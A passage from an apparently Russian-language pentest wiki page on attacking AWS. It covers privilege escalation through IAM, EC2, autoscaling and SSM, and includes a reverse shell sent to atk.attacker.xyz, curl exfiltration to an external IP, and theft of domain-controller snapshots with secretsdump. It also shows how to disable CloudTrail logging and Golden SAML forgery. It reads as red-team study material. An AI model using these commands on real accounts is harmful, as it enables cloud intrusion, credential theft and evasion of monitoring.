ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

Сервис по извлечению ценной информации из текста и работе с ним.

[[File:Aws comprehend.png|1000px]]

Список категорий, на которые может разбить текст, есть на фото выше.

Для пользовательских настроек есть несколько параметров:

- Кастомные классификации

- Кастомные определения вставок в тексте

- Endpoints - для real-time работы. !!! Достаточно дорогой сервис. В месяц берет 1400$ при минимальной сборке, поэтому если злоумышленник сможет запускать в нем Endpoint'ы в большом количестве, то компания обанкротится.

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

Собирает метрики из различных сервисов и детектит различные аномалии. Проще говоря, делает статистику по метрикам и с машинным обучением находит ошибки.

Источники метрик:

* CloudWatch

* AWS Config

* CloudTrail

* X-Ray

Если рассуждать со стороны злоумышленника, то если у него есть доступ к DevOps Guru, то у него также есть AIM-роль "Amazon DevOps Guru_Role" и привилегии на доступ к следующим ресурсам:

* Amazon CloudWatch

* Amazon CloudWatch Events

* Amazon CloudWatch Logs

* AWS CodeDeploy

* AWS CodePipeline

* AWS CloudFormation

* AWS CloudTrail

* AWS Systems Manager

* AWS X-Ray

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

Служба прогнозирования временных рядов используя машинное обучение (предсказывание последующих событий).

https://aws.amazon.com/ru/forecast/

При настройке можно выбрать один из forecasting-доменов:

* Retail

* Custom

* Inventory planning

* EC2 capacity

* Work force

* Web traffic

* Metrics

Формально это шаблоны для быстрой настройки сервиса.

Если у атакующего есть привилегии данного сервиса, то можно предположить, что он тоже может получать те же данные (например, количество трафика), что и сам сервис

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

"Разработка и развертывание моделей выявления мошенничества используя машинное обучение"

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-18T12:36:41Z

Drakylar: /* Forecast */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
